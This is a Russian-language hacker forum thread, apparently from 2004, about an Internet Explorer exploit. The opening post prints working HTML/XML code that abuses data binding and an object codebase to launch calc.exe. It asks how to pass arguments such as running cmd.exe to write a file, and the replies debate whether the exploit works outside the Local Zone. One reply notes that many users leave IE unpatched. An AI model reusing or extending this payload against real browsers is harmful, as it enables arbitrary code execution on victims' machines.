Всем известен кусок кода, запускающий калькулятор:
<span datasrc="#oExec" datafld="exploit"
dataformatas="html"></span>
<xml
id="oExec">
<security><exploit><![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Вопросик:Как ещё передать параметры командной строки?Не выходит, ну например запустить cmd.exe с параметром echo aaa>1.txt???

какой смысл в этом эксплойте, если он катит только в Локальной Зоне??? http://forum.antichat.ru/iB_html/non...icons/cool.gif

к тамуже есть способ намного компактнее!

посмотри о новом баге  в IE на  secutityfocus за 24 число.

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (zFailure @ июня 28 2004,21:52)</td></tr><tr><td id="QUOTE">какой смысл в этом эксплойте, если он катит только в Локальной Зоне??? http://forum.antichat.ru/iB_html/non...icons/cool.gif[/QUOTE]<span id='postcolor'>
Вовсе нет, этот катил и в глобальной зоне (по кр. мере раньше).

сам проверил ради интереса на локалоном сервере

так действительно запускается
C:\Apache Group\Apache2\htdocs\exploits\0001\1.html

так уже нет
http://a/exploits/0001/1.html

вывод - работает только в локально зоне

правда далеко не все ставят последние патчи на свой IE =)